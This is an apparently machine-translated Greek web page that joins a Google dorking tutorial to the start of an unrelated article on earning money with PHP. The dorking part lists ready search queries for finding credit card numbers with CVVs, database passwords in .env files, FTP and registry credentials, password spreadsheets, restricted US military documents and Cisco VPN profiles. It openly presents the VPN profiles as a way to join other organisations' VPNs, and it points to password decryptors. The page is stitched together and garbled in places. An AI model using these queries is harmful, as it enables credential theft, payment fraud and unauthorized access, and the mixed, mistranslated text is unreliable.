Inurl php http τι κέρδη. Πώς να κερδίσετε χρήματα γνωρίζοντας PHP; Πώς μπορεί ένας προγραμματιστής php να βγάλει καλά χρήματα στο σπίτι;

Η απόκτηση ιδιωτικών δεδομένων δεν σημαίνει πάντα hacking - μερικές φορές δημοσιεύεται δημόσια. Η γνώση των ρυθμίσεων της Google και λίγη εφευρετικότητα θα σας επιτρέψουν να βρείτε πολλά ενδιαφέροντα πράγματα - από αριθμούς πιστωτικών καρτών μέχρι έγγραφα του FBI.

ΠΡΟΕΙΔΟΠΟΙΗΣΗ

Όλες οι πληροφορίες παρέχονται μόνο για ενημερωτικούς σκοπούς. Ούτε οι συντάκτες ούτε ο συγγραφέας ευθύνονται για οποιαδήποτε πιθανή βλάβη που προκαλείται από τα υλικά αυτού του άρθρου.

Σήμερα, τα πάντα είναι συνδεδεμένα στο Διαδίκτυο, με ελάχιστη ανησυχία για τον περιορισμό της πρόσβασης. Ως εκ τούτου, πολλά ιδιωτικά δεδομένα γίνονται θήραμα των μηχανών αναζήτησης. Τα ρομπότ Spider δεν περιορίζονται πλέον σε ιστοσελίδες, αλλά ευρετηριάζουν όλο το περιεχόμενο που είναι διαθέσιμο στο Διαδίκτυο και προσθέτουν συνεχώς μη δημόσιες πληροφορίες στις βάσεις δεδομένων τους. Το να ανακαλύψετε αυτά τα μυστικά είναι εύκολο - απλά πρέπει να ξέρετε πώς να ρωτήσετε για αυτά.

Αναζήτηση αρχείων

Σε ικανά χέρια, η Google θα βρει γρήγορα οτιδήποτε δεν βρίσκεται στο Διαδίκτυο, για παράδειγμα, προσωπικές πληροφορίες και αρχεία για επίσημη χρήση. Συχνά είναι κρυμμένα σαν ένα κλειδί κάτω από ένα χαλί: δεν υπάρχουν πραγματικοί περιορισμοί πρόσβασης, τα δεδομένα βρίσκονται απλώς στο πίσω μέρος του ιστότοπου, όπου δεν οδηγούν σύνδεσμοι. Η τυπική διεπαφή ιστού Google παρέχει μόνο βασικές ρυθμίσεις σύνθετης αναζήτησης, αλλά ακόμη και αυτές θα είναι επαρκείς.

Μπορείτε να περιορίσετε την αναζήτησή σας στο Google σε έναν συγκεκριμένο τύπο αρχείου χρησιμοποιώντας δύο τελεστές: filetype και ext . Το πρώτο καθορίζει τη μορφή που καθόρισε η μηχανή αναζήτησης από τον τίτλο του αρχείου, το δεύτερο καθορίζει την επέκταση αρχείου, ανεξάρτητα από το εσωτερικό του περιεχόμενο. Κατά την αναζήτηση και στις δύο περιπτώσεις, χρειάζεται μόνο να καθορίσετε την επέκταση. Αρχικά, ο τελεστής ext ήταν βολικός στη χρήση σε περιπτώσεις όπου το αρχείο δεν είχε συγκεκριμένα χαρακτηριστικά μορφής (για παράδειγμα, για αναζήτηση αρχείων διαμόρφωσης ini και cfg, τα οποία θα μπορούσαν να περιέχουν οτιδήποτε). Τώρα οι αλγόριθμοι της Google έχουν αλλάξει και δεν υπάρχει ορατή διαφορά μεταξύ των χειριστών - στις περισσότερες περιπτώσεις τα αποτελέσματα είναι τα ίδια.


Φιλτράρισμα των αποτελεσμάτων

Από προεπιλογή, το Google αναζητά λέξεις και, γενικά, τυχόν χαρακτήρες που έχουν εισαχθεί σε όλα τα αρχεία σε σελίδες με ευρετήριο. Μπορείτε να περιορίσετε την περιοχή αναζήτησης κατά τομέα ανώτατου επιπέδου, έναν συγκεκριμένο ιστότοπο ή με τη θέση της ακολουθίας αναζήτησης στα ίδια τα αρχεία. Για τις δύο πρώτες επιλογές, χρησιμοποιήστε τον χειριστή τοποθεσίας, ακολουθούμενο από το όνομα του τομέα ή της επιλεγμένης τοποθεσίας. Στην τρίτη περίπτωση, ένα ολόκληρο σύνολο τελεστών σάς επιτρέπει να αναζητήσετε πληροφορίες σε πεδία υπηρεσιών και μεταδεδομένα. Για παράδειγμα, το allinurl θα βρει το δεδομένο στο σώμα των ίδιων των συνδέσμων, allinanchor - στο κείμενο που είναι εξοπλισμένο με την ετικέτα , allintitle - σε τίτλους σελίδων, allintext - στο σώμα των σελίδων.

Για κάθε χειριστή υπάρχει μια ελαφριά έκδοση με μικρότερο όνομα (χωρίς το πρόθεμα all). Η διαφορά είναι ότι το allinurl θα βρει συνδέσμους με όλες τις λέξεις και το inurl θα βρει συνδέσμους μόνο με την πρώτη από αυτές. Η δεύτερη και οι επόμενες λέξεις από το ερώτημα μπορούν να εμφανιστούν οπουδήποτε στις ιστοσελίδες. Ο τελεστής inurl διαφέρει επίσης από έναν άλλο χειριστή με παρόμοια σημασία - τοποθεσία. Το πρώτο σάς επιτρέπει επίσης να βρείτε οποιαδήποτε ακολουθία χαρακτήρων σε έναν σύνδεσμο προς το έγγραφο που αναζητήσατε (για παράδειγμα, /cgi-bin/), το οποίο χρησιμοποιείται ευρέως για την εύρεση στοιχείων με γνωστά τρωτά σημεία.

Ας το δοκιμάσουμε στην πράξη. Παίρνουμε το φίλτρο allintext και κάνουμε το αίτημα να παράγει μια λίστα με αριθμούς και κωδικούς επαλήθευσης πιστωτικών καρτών που θα λήξουν μόνο σε δύο χρόνια (ή όταν οι ιδιοκτήτες τους κουραστούν να ταΐζουν τους πάντες).

Allintext: ημερομηνία λήξης αριθμού κάρτας /2017 cvv

Όταν διαβάζετε στις ειδήσεις ότι ένας νεαρός χάκερ «παραβίασε τους διακομιστές» του Πενταγώνου ή της NASA, κλέβοντας απόρρητες πληροφορίες, στις περισσότερες περιπτώσεις μιλάμε για μια τέτοια βασική τεχνική χρήσης της Google. Ας υποθέσουμε ότι μας ενδιαφέρει μια λίστα με τους υπαλλήλους της NASA και τα στοιχεία επικοινωνίας τους. Σίγουρα μια τέτοια λίστα είναι διαθέσιμη σε ηλεκτρονική μορφή. Για ευκολία ή λόγω επίβλεψης, μπορεί επίσης να βρίσκεται στον ίδιο τον ιστότοπο του οργανισμού. Είναι λογικό ότι σε αυτή την περίπτωση δεν θα υπάρχουν σύνδεσμοι προς αυτό, αφού προορίζεται για εσωτερική χρήση. Ποιες λέξεις μπορεί να υπάρχουν σε ένα τέτοιο αρχείο; Τουλάχιστον - το πεδίο "διεύθυνση". Η δοκιμή όλων αυτών των υποθέσεων είναι εύκολη.


Inurl:nasa.gov τύπος αρχείου:xlsx "διεύθυνση"


Χρησιμοποιούμε γραφειοκρατία

Ευρήματα όπως αυτό είναι μια ωραία πινελιά. Πραγματικά αξιόπιστη γνώση παρέχεται από μια πιο λεπτομερή γνώση των χειριστών της Google για webmasters, το ίδιο το Δίκτυο και τις ιδιαιτερότητες της δομής αυτού που αναζητείται. Γνωρίζοντας τις λεπτομέρειες, μπορείτε εύκολα να φιλτράρετε τα αποτελέσματα και να βελτιώσετε τις ιδιότητες των απαραίτητων αρχείων, προκειμένου να λάβετε πραγματικά πολύτιμα δεδομένα στα υπόλοιπα. Είναι αστείο που η γραφειοκρατία έρχεται να σώσει εδώ. Παράγει τυπικές συνθέσεις που είναι βολικές για την αναζήτηση μυστικών πληροφοριών που διέρρευσαν κατά λάθος στο Διαδίκτυο.

Για παράδειγμα, η σφραγίδα δήλωσης διανομής, που απαιτείται από το Υπουργείο Άμυνας των ΗΠΑ, σημαίνει τυποποιημένους περιορισμούς στη διανομή ενός εγγράφου. Το γράμμα Α υποδηλώνει δημόσιες εκδόσεις στις οποίες δεν υπάρχει τίποτα μυστικό. B - προορίζεται μόνο για εσωτερική χρήση, C - αυστηρά εμπιστευτικό και ούτω καθεξής μέχρι το F. Το γράμμα X ξεχωρίζει, το οποίο σηματοδοτεί ιδιαίτερα πολύτιμες πληροφορίες που αντιπροσωπεύουν ένα κρατικό μυστικό ανώτατου επιπέδου. Ας αναζητήσουν τέτοια έγγραφα όσοι υποτίθεται ότι θα το κάνουν εν ώρα υπηρεσίας και θα περιοριστούμε σε αρχεία με το γράμμα C. Σύμφωνα με την οδηγία DoDI 5230.24, αυτή η σήμανση αποδίδεται σε έγγραφα που περιέχουν περιγραφή κρίσιμων τεχνολογιών που εμπίπτουν στον έλεγχο των εξαγωγών . Μπορείτε να βρείτε τέτοιες προσεκτικά προστατευμένες πληροφορίες σε ιστότοπους στο domain.mil ανώτατου επιπέδου, που διατίθενται για τον στρατό των ΗΠΑ.

"ΔΗΛΩΣΗ ΔΙΑΝΟΜΗΣ Γ" inurl:navy.mil

Είναι πολύ βολικό ο τομέας .mil να περιέχει μόνο τοποθεσίες από το Υπουργείο Άμυνας των Η.Π.Α. και τους συμβατικούς οργανισμούς του. Τα αποτελέσματα αναζήτησης με περιορισμό τομέα είναι εξαιρετικά καθαρά και οι τίτλοι μιλούν από μόνοι τους. Η αναζήτηση για ρωσικά μυστικά με αυτόν τον τρόπο είναι πρακτικά άχρηστη: το χάος επικρατεί στα domains.ru και.rf και τα ονόματα πολλών οπλικών συστημάτων ακούγονται σαν βοτανικά (PP "Kiparis", αυτοκινούμενα όπλα "Akatsia") ή ακόμα και φανταστικά ( TOS “Buratino”).


Μελετώντας προσεκτικά οποιοδήποτε έγγραφο από έναν ιστότοπο στον τομέα .mil, μπορείτε να δείτε άλλους δείκτες για να κάνετε πιο συγκεκριμένη την αναζήτησή σας. Για παράδειγμα, μια αναφορά στους περιορισμούς εξαγωγής "Sec 2751", που είναι επίσης βολικό για την αναζήτηση ενδιαφέρουσες τεχνικές πληροφορίες. Κατά καιρούς αφαιρείται από τους επίσημους ιστότοπους όπου εμφανιζόταν κάποτε, επομένως εάν δεν μπορείτε να ακολουθήσετε έναν ενδιαφέρον σύνδεσμο στα αποτελέσματα αναζήτησης, χρησιμοποιήστε την προσωρινή μνήμη της Google (χειριστή προσωρινής μνήμης) ή τον ιστότοπο Αρχείο Διαδικτύου.

Σκαρφαλώνοντας στα σύννεφα

Εκτός από τα τυχαία αποχαρακτηρισμένα κυβερνητικά έγγραφα, στην κρυφή μνήμη της Google εμφανίζονται περιστασιακά σύνδεσμοι προς προσωπικά αρχεία από το Dropbox και άλλες υπηρεσίες αποθήκευσης δεδομένων που δημιουργούν "ιδιωτικούς" συνδέσμους σε δημόσια δημοσιευμένα δεδομένα. Είναι ακόμα χειρότερο με εναλλακτικές και σπιτικές υπηρεσίες. Για παράδειγμα, το ακόλουθο ερώτημα βρίσκει δεδομένα για όλους τους πελάτες της Verizon που έχουν εγκατεστημένο διακομιστή FTP και χρησιμοποιούν ενεργά τον δρομολογητή τους.

Allinurl:ftp://verizon.net

Υπάρχουν τώρα περισσότεροι από σαράντα χιλιάδες τέτοιοι έξυπνοι άνθρωποι και την άνοιξη του 2015 ήταν πολλοί περισσότεροι. Αντί για το Verizon.net, μπορείτε να αντικαταστήσετε το όνομα οποιουδήποτε γνωστού παρόχου και όσο πιο διάσημο είναι, τόσο μεγαλύτερο μπορεί να είναι το αλίευμα. Μέσω του ενσωματωμένου διακομιστή FTP, μπορείτε να δείτε αρχεία σε μια εξωτερική συσκευή αποθήκευσης συνδεδεμένη στο δρομολογητή. Συνήθως αυτό είναι ένα NAS για απομακρυσμένη εργασία, ένα προσωπικό σύννεφο ή κάποιο είδος λήψης αρχείων peer-to-peer. Όλα τα περιεχόμενα τέτοιων μέσων ευρετηριάζονται από την Google και άλλες μηχανές αναζήτησης, ώστε να έχετε πρόσβαση σε αρχεία που είναι αποθηκευμένα σε εξωτερικές μονάδες δίσκου μέσω απευθείας συνδέσμου.

Κοιτάζοντας τις ρυθμίσεις

Πριν από την εκτεταμένη μετάβαση στο cloud, απλοί διακομιστές FTP κυριαρχούσαν ως απομακρυσμένη αποθήκευση, η οποία είχε επίσης πολλά τρωτά σημεία. Πολλά από αυτά εξακολουθούν να είναι επίκαιρα σήμερα. Για παράδειγμα, το δημοφιλές πρόγραμμα WS_FTP Professional αποθηκεύει δεδομένα διαμόρφωσης, λογαριασμούς χρήστη και κωδικούς πρόσβασης στο αρχείο ws_ftp.ini. Είναι εύκολο να το βρείτε και να διαβάσετε, καθώς όλες οι εγγραφές αποθηκεύονται σε μορφή κειμένου και οι κωδικοί πρόσβασης κρυπτογραφούνται με τον αλγόριθμο Triple DES μετά από ελάχιστη συσκότιση. Στις περισσότερες εκδόσεις, αρκεί απλώς η απόρριψη του πρώτου byte.

Είναι εύκολο να αποκρυπτογραφήσετε τέτοιους κωδικούς πρόσβασης χρησιμοποιώντας το βοηθητικό πρόγραμμα WS_FTP Password Decryptor ή μια δωρεάν υπηρεσία web.

Όταν μιλάμε για παραβίαση ενός αυθαίρετου ιστότοπου, συνήθως εννοούν την απόκτηση κωδικού πρόσβασης από αρχεία καταγραφής και αντίγραφα ασφαλείας αρχείων διαμόρφωσης CMS ή εφαρμογών ηλεκτρονικού εμπορίου. Εάν γνωρίζετε την τυπική δομή τους, μπορείτε εύκολα να υποδείξετε τις λέξεις-κλειδιά. Γραμμές όπως αυτές που βρίσκονται στο ws_ftp.ini είναι εξαιρετικά κοινές. Για παράδειγμα, στο Drupal και στο PrestaShop υπάρχει πάντα ένα αναγνωριστικό χρήστη (UID) και ένας αντίστοιχος κωδικός πρόσβασης (pwd) και όλες οι πληροφορίες αποθηκεύονται σε αρχεία με την επέκταση .inc. Μπορείτε να τα αναζητήσετε ως εξής:

"pwd=" "UID=" ext:inc

Αποκάλυψη κωδικών πρόσβασης DBMS

Στα αρχεία διαμόρφωσης των διακομιστών SQL, τα ονόματα χρηστών και οι διευθύνσεις email αποθηκεύονται σε καθαρό κείμενο και οι κατακερματισμοί MD5 τους γράφονται αντί για κωδικούς πρόσβασης. Αυστηρά μιλώντας, είναι αδύνατο να τα αποκρυπτογραφήσετε, αλλά μπορείτε να βρείτε ένα ταίριασμα ανάμεσα στα γνωστά ζεύγη hash-password.

Υπάρχουν ακόμη DBMS που δεν χρησιμοποιούν καν κατακερματισμό κωδικού πρόσβασης. Τα αρχεία ρυθμίσεων οποιουδήποτε από αυτά μπορούν απλά να προβληθούν στο πρόγραμμα περιήγησης.

Intext:DB_PASSWORD τύπος αρχείου:env

Με την εμφάνιση των διακομιστών Windows, η θέση των αρχείων διαμόρφωσης καταλήφθηκε εν μέρει από το μητρώο. Μπορείτε να κάνετε αναζήτηση στους κλάδους του με τον ίδιο ακριβώς τρόπο, χρησιμοποιώντας το reg ως τύπο αρχείου. Για παράδειγμα, όπως αυτό:

Τύπος αρχείου:reg HKEY_CURRENT_USER "Κωδικός πρόσβασης"=

Ας μην ξεχνάμε το αυτονόητο

Μερικές φορές είναι δυνατό να φτάσετε σε απόρρητες πληροφορίες χρησιμοποιώντας δεδομένα που ανοίχτηκαν κατά λάθος και έπεσαν στην προσοχή της Google. Η ιδανική επιλογή είναι να βρείτε μια λίστα με κωδικούς πρόσβασης σε κάποια κοινή μορφή. Μόνο οι απελπισμένοι μπορούν να αποθηκεύσουν πληροφορίες λογαριασμού σε ένα αρχείο κειμένου, έγγραφο Word ή υπολογιστικό φύλλο Excel, αλλά υπάρχουν πάντα αρκετές από αυτές.

Τύπος αρχείου:xls inurl:password

Από τη μία πλευρά, υπάρχουν πολλά μέσα για την αποτροπή τέτοιων περιστατικών. Είναι απαραίτητο να καθορίσετε επαρκή δικαιώματα πρόσβασης στο htaccess, να επιδιορθώσετε το CMS, να μην χρησιμοποιήσετε αριστερόστροφα σενάρια και να κλείσετε άλλες τρύπες. Υπάρχει επίσης ένα αρχείο με μια λίστα εξαιρέσεων robots.txt που απαγορεύει στις μηχανές αναζήτησης να ευρετηριάζουν τα αρχεία και τους καταλόγους που καθορίζονται σε αυτό. Από την άλλη, αν η δομή του robots.txt σε κάποιο διακομιστή διαφέρει από την τυπική, τότε γίνεται αμέσως σαφές τι προσπαθούν να κρύψουν σε αυτόν.

Η λίστα των καταλόγων και των αρχείων σε οποιονδήποτε ιστότοπο προηγείται από το τυπικό ευρετήριο του. Εφόσον για λόγους υπηρεσίας πρέπει να εμφανίζεται στον τίτλο, είναι λογικό να περιορίζεται η αναζήτησή του στον τελεστή του τίτλου. Ενδιαφέροντα πράγματα βρίσκονται στους καταλόγους /admin/, /personal/, /etc/ ακόμα και /secret/.

Μείνετε συντονισμένοι για ενημερώσεις

Η συνάφεια είναι εξαιρετικά σημαντική εδώ: τα παλιά τρωτά σημεία κλείνουν πολύ αργά, αλλά το Google και τα αποτελέσματα αναζήτησής του αλλάζουν συνεχώς. Υπάρχει ακόμη και διαφορά μεταξύ ενός φίλτρου "τελευταίου δευτερολέπτου" (&tbs=qdr:s στο τέλος του URL αιτήματος) και ενός φίλτρου "σε πραγματικό χρόνο" (&tbs=qdr:1).

Το χρονικό διάστημα της τελευταίας ημερομηνίας ενημέρωσης του αρχείου υποδεικνύεται επίσης σιωπηρά από την Google. Μέσω της γραφικής διεπαφής web, μπορείτε να επιλέξετε μία από τις τυπικές περιόδους (ώρα, ημέρα, εβδομάδα, κ.λπ.) ή να ορίσετε ένα εύρος ημερομηνιών, αλλά αυτή η μέθοδος δεν είναι κατάλληλη για αυτοματοποίηση.

Από την εμφάνιση της γραμμής διευθύνσεων, μπορείτε μόνο να μαντέψετε έναν τρόπο περιορισμού της παραγωγής των αποτελεσμάτων χρησιμοποιώντας την κατασκευή &tbs=qdr:. Το γράμμα y αφού ορίζει το όριο του ενός έτους (&tbs=qdr:y), το m δείχνει τα αποτελέσματα για τον τελευταίο μήνα, w - για την εβδομάδα, d - για την προηγούμενη ημέρα, h - για την τελευταία ώρα, n - για το λεπτό, και s - για δώσε μου ένα δευτερόλεπτο. Τα πιο πρόσφατα αποτελέσματα που μόλις ανακοίνωσε η Google βρίσκονται χρησιμοποιώντας το φίλτρο &tbs=qdr:1 .

Εάν πρέπει να γράψετε ένα έξυπνο σενάριο, θα είναι χρήσιμο να γνωρίζετε ότι το εύρος ημερομηνιών έχει οριστεί στο Google σε Ιουλιανή μορφή χρησιμοποιώντας τον τελεστή daterange. Για παράδειγμα, με αυτόν τον τρόπο μπορείτε να βρείτε μια λίστα εγγράφων PDF με τη λέξη εμπιστευτικά, τα οποία έχουν ληφθεί από την 1η Ιανουαρίου έως την 1η Ιουλίου 2015.

Εμπιστευτικός τύπος αρχείου:pdf daterange:2457024-2457205

Το εύρος υποδεικνύεται σε μορφή Ιουλιανής ημερομηνίας χωρίς να λαμβάνεται υπόψη το κλασματικό μέρος. Η μη αυτόματη μετάφραση τους από το Γρηγοριανό ημερολόγιο δεν είναι βολική. Είναι πιο εύκολο να χρησιμοποιήσετε έναν μετατροπέα ημερομηνίας.

Στόχευση και φιλτράρισμα ξανά

Εκτός από τον καθορισμό πρόσθετων τελεστών στο ερώτημα αναζήτησης, μπορούν να σταλούν απευθείας στο σώμα του συνδέσμου. Για παράδειγμα, η προδιαγραφή filetype:pdf αντιστοιχεί στην κατασκευή as_filetype=pdf . Αυτό καθιστά βολικό να ζητήσετε διευκρινίσεις. Ας πούμε ότι η έξοδος των αποτελεσμάτων μόνο από τη Δημοκρατία της Ονδούρας καθορίζεται προσθέτοντας την κατασκευή cr=countryHN στη διεύθυνση URL αναζήτησης και μόνο από την πόλη Bobruisk - gcs=Bobruisk. Μπορείτε να βρείτε μια πλήρη λίστα στην ενότητα προγραμματιστών.

Τα εργαλεία αυτοματισμού της Google έχουν σχεδιαστεί για να κάνουν τη ζωή πιο εύκολη, αλλά συχνά προσθέτουν προβλήματα. Για παράδειγμα, η πόλη του χρήστη καθορίζεται από την IP του χρήστη μέσω του WHOIS. Με βάση αυτές τις πληροφορίες, η Google όχι μόνο εξισορροπεί το φορτίο μεταξύ των διακομιστών, αλλά αλλάζει και τα αποτελέσματα αναζήτησης. Ανάλογα με την περιοχή, για το ίδιο αίτημα, θα εμφανιστούν διαφορετικά αποτελέσματα στην πρώτη σελίδα και ορισμένα από αυτά ενδέχεται να είναι εντελώς κρυφά. Ο κωδικός δύο γραμμάτων μετά την οδηγία gl=country θα σας βοηθήσει να νιώσετε σαν κοσμοπολίτης και να αναζητήσετε πληροφορίες από οποιαδήποτε χώρα. Για παράδειγμα, ο κωδικός της Ολλανδίας είναι NL, αλλά το Βατικανό και η Βόρεια Κορέα δεν έχουν δικό τους κωδικό στο Google.

Συχνά, τα αποτελέσματα αναζήτησης καταλήγουν ακατάστατα ακόμα και μετά τη χρήση πολλών προηγμένων φίλτρων. Σε αυτήν την περίπτωση, είναι εύκολο να διευκρινιστεί το αίτημα προσθέτοντας πολλές λέξεις εξαίρεσης σε αυτό (ένα σύμβολο μείον τοποθετείται μπροστά από καθεμία από αυτές). Για παράδειγμα, η τραπεζική, τα ονόματα και ο οδηγός χρησιμοποιούνται συχνά με τη λέξη Personal. Ως εκ τούτου, τα πιο καθαρά αποτελέσματα αναζήτησης δεν θα εμφανίζονται από ένα παράδειγμα ενός σχολικού βιβλίου ενός ερωτήματος, αλλά από ένα εκλεπτυσμένο:

Τίτλος:"Ευρετήριο /Personal/" -ονόματα -tutorial -banking

Ένα τελευταίο παράδειγμα

Ένας εξελιγμένος χάκερ διακρίνεται από το γεγονός ότι παρέχει στον εαυτό του όλα όσα χρειάζεται μόνος του. Για παράδειγμα, το VPN είναι ένα βολικό πράγμα, αλλά είτε ακριβό, είτε προσωρινό και με περιορισμούς. Η εγγραφή για μια συνδρομή για τον εαυτό σας είναι πολύ ακριβή. Είναι καλό που υπάρχουν ομαδικές συνδρομές και με τη βοήθεια της Google είναι εύκολο να γίνεις μέλος μιας ομάδας. Για να το κάνετε αυτό, απλώς βρείτε το αρχείο διαμόρφωσης Cisco VPN, το οποίο έχει μια μάλλον μη τυπική επέκταση PCF και μια αναγνωρίσιμη διαδρομή: Program Files\Cisco Systems\VPN Client\Profiles. Ένα αίτημα και γίνεσαι μέλος, για παράδειγμα, στη φιλική ομάδα του Πανεπιστημίου της Βόννης.

Τύπος αρχείου:pcf vpn Ή Ομάδα

ΠΛΗΡΟΦΟΡΙΕΣ

Η Google βρίσκει αρχεία διαμόρφωσης κωδικού πρόσβασης, αλλά πολλά από αυτά είναι κρυπτογραφημένα ή αντικαθίστανται με κατακερματισμούς. Αν δείτε συμβολοσειρές σταθερού μήκους, αναζητήστε αμέσως μια υπηρεσία αποκρυπτογράφησης.

Οι κωδικοί πρόσβασης αποθηκεύονται κρυπτογραφημένοι, αλλά ο Maurice Massard έχει ήδη γράψει ένα πρόγραμμα για την αποκρυπτογράφηση τους και το παρέχει δωρεάν μέσω του thecampusgeeks.com.

Η Google εκτελεί εκατοντάδες διαφορετικούς τύπους επιθέσεων και δοκιμές διείσδυσης. Υπάρχουν πολλές επιλογές, που επηρεάζουν δημοφιλή προγράμματα, μεγάλες μορφές βάσης δεδομένων, πολυάριθμα τρωτά σημεία της PHP, σύννεφα και ούτω καθεξής. Γνωρίζοντας τι ακριβώς ψάχνετε θα είναι πολύ πιο εύκολο να βρείτε τις πληροφορίες που χρειάζεστε (ειδικά τις πληροφορίες που δεν είχατε σκοπό να δημοσιοποιήσετε). Ο Shodan δεν είναι ο μόνος που τροφοδοτεί με ενδιαφέρουσες ιδέες, αλλά κάθε βάση δεδομένων ευρετηριασμένων πόρων δικτύου!

Από τον συγγραφέα:Γεια σας φίλοι! Σε αυτό το άρθρο θα μιλήσουμε για τη γλώσσα προγραμματισμού PHP. Ας μάθουμε σε τι χρησιμοποιείται, τι μπορείτε να κάνετε με αυτό και ποια θέση κατέχει στα στάδια ανάπτυξης ιστοτόπου. Επίσης σε αυτό το άρθρο θα εξετάσουμε πολλούς τρόπους για να κερδίσετε χρήματα γνωρίζοντας πώς να προγραμματίζετε σε PHP.

Τι είναι η PHP και σε τι χρησιμεύει;

Η PHP είναι μια γλώσσα δέσμης ενεργειών που χρησιμοποιείται πολύ ενεργά στην ανάπτυξη διαδικτυακών εφαρμογών. Η PHP είναι μια από τις κορυφαίες γλώσσες που χρησιμοποιούνται στην ανάπτυξη δυναμικών ιστοσελίδων.

Η PHP είναι μια γλώσσα προγραμματισμού από την πλευρά του διακομιστή. Όλα τα σενάρια που είναι γραμμένα σε αυτήν τη γλώσσα εκτελούνται στον διακομιστή με τον ιστότοπο. Για να μελετήσετε την PHP, να αναπτύξετε και να διορθώσετε ιστοσελίδες και σενάρια, φυσικά, δεν χρειάζεται να αγοράσετε έναν πραγματικό διακομιστή στο Διαδίκτυο. Για τους σκοπούς αυτούς, χρησιμοποιούνται εξομοιωτές διακομιστή, οι οποίοι με τη μορφή προγραμμάτων απλά εγκαθίστανται σε έναν υπολογιστή που λειτουργεί. Και σε διακομιστή στο Διαδίκτυο (φιλοξενία) τοποθετούνται έτοιμες ιστοσελίδες και σελίδες με σενάρια PHP. Παρεμπιπτόντως, σχεδόν όλο το σύγχρονο hosting υποστηρίζει τη γλώσσα PHP.

Η δημοτικότητα αυτής της γλώσσας στον τομέα της ανάπτυξης ιστοτόπων καθορίζεται από την παρουσία ενός μεγάλου συνόλου ενσωματωμένων εργαλείων για την ανάπτυξη εφαρμογών Ιστού. Τα κυριότερα:

αυτόματη εξαγωγή των παραμέτρων POST και GET, καθώς και μεταβλητών περιβάλλοντος διακομιστή ιστού σε προκαθορισμένους πίνακες.

αλληλεπίδραση με μεγάλο αριθμό διαφορετικών συστημάτων διαχείρισης βάσεων δεδομένων (MySQL, MySQLi, SQLite, PostgreSQL, Oracle (OCI8), Oracle, Microsoft SQL Server, Sybase, ODBC, mSQL, IBM DB2, Cloudscape και Apache Derby, Informix, Ovrimos SQL, Σημειώσεις , DB++, DBM, dBase, DBX, FrontBase, FilePro, Ingres II, SESAM, Firebird / InterBase, Paradox File Access, MaxDB, PDO Interface);

αυτοματοποιημένη αποστολή κεφαλίδων HTTP.

εργασία με cookies και περιόδους σύνδεσης·

εργασία με τοπικά και απομακρυσμένα αρχεία, υποδοχές.

επεξεργασία αρχείων που έχουν αποσταλεί στον διακομιστή·

εργασία με XForms.

Ας δούμε ένα παράδειγμα όπου το σενάριο PHP εκτελείται στη σελίδα. Πάρτε, για παράδειγμα, τη φόρμα συνδρομής στην οποία εισάγετε το όνομα και το email σας σε πολλούς ιστότοπους. Το HTML και το CSS είναι υπεύθυνα για την εμφάνιση της φόρμας - τα χρώματα των πεδίων και των κουμπιών εισαγωγής, η αλλαγή του χρώματος του κουμπιού όταν τοποθετείτε τον δείκτη του ποντικιού και κάνετε κλικ σε αυτό και ούτω καθεξής. Χρησιμοποιώντας HTML5, μπορείτε να ελέγξετε την ορθότητα των δεδομένων που εισάγονται στη φόρμα - για παράδειγμα, εάν τα πεδία email ή τηλεφώνου έχουν συμπληρωθεί σωστά.

Και αφού κάνετε κλικ στο κουμπί "Εγγραφή", καλείται ένα σενάριο PHP, το οποίο λαμβάνει τα δεδομένα που καταχωρίσατε στη φόρμα. Το σενάριο τα καταγράφει στη βάση δεδομένων, δημιουργεί και σας στέλνει έναν σύνδεσμο για να επιβεβαιώσετε τη συνδρομή σας στο email που καθορίζεται στη φόρμα, ελέγχει την επιβεβαίωση της συνδρομής και σας στέλνει τα επόμενα email. Όλες αυτές οι λειτουργίες εκτελούνται στον διακομιστή και αυτό γίνεται χρησιμοποιώντας τη γλώσσα προγραμματισμού PHP.

Εφαρμογή της PHP στην ανάπτυξη ιστοσελίδων

Για να δημιουργήσετε έναν ιστότοπο, πρέπει να περάσετε από διάφορα στάδια:

Σχεδίαση. Σε αυτό το στάδιο, σχεδιάζουμε τον μελλοντικό ιστότοπο: για ποιον και γιατί τον φτιάχνουμε, ποιος θα επισκεφτεί τον ιστότοπο, με τι να τον γεμίσει, τι πρέπει να υπάρχει στον ιστότοπο και ούτω καθεξής.

Σχέδιο. Στο στάδιο του σχεδιασμού, δημιουργούμε την εμφάνιση των σελίδων του ιστότοπου σε ένα πρόγραμμα επεξεργασίας γραφικών.

Διάταξη. Στο στάδιο της διάταξης, χρησιμοποιώντας HTML και CSS, δημιουργούμε τις σελίδες HTML του μελλοντικού ιστότοπου από τις διατάξεις που αποκτήθηκαν στο στάδιο του σχεδιασμού.

Προγραμματισμός. Στο στάδιο του προγραμματισμού, αυτοματοποιούμε τις διαδικασίες εργασίας με τον ιστότοπο. Προγραμματίζουμε το διοικητικό μέρος του ιστότοπου (πίνακας διαχείρισης) έτσι ώστε να μπορείτε να προσθέτετε, να διαγράφετε, να επεξεργάζεστε υπάρχουσες σελίδες ακόμα και για ένα άτομο που δεν είναι απολύτως εξοικειωμένο με τη δημιουργία ιστοσελίδων. Προγραμματίζουμε έτσι ώστε η αναζήτηση και όλες οι φόρμες συνδρομής (αν υπάρχουν) στον ιστότοπο να λειτουργούν. Βεβαιωνόμαστε ότι η σελίδα που προστέθηκε πρόσφατα εμφανίζεται στον ιστότοπο και ένας σύνδεσμος προς τη σελίδα που δημιουργήθηκε εμφανίζεται αυτόματα στο μενού. Εάν ο ιστότοπος χρησιμοποιεί ψηφοφορία ή έρευνα, τότε όλα αυτά προγραμματίζονται σε PHP, στο στάδιο του προγραμματισμού.

Εάν λάβουμε υπόψη το στάδιο του προγραμματισμού ενός μεγαλύτερου ιστότοπου, για παράδειγμα, ενός ηλεκτρονικού καταστήματος, τότε όλα εδώ είναι ακόμη ευρύτερα και πιο ενδιαφέροντα. Σε αυτήν την περίπτωση, προσθέτουμε όχι μόνο σελίδες, αλλά και προϊόντα - το κύριο περιεχόμενο του ηλεκτρονικού καταστήματος. Επιπλέον, στον πίνακα διαχείρισης πρέπει να παρέχετε μια ανάλυση των προστιθέμενων προϊόντων σε διάφορες κατηγορίες. Θα πρέπει επίσης να είναι δυνατή η επεξεργασία του προϊόντος, η αλλαγή της περιγραφής, της τιμής, της εικόνας κ.λπ.

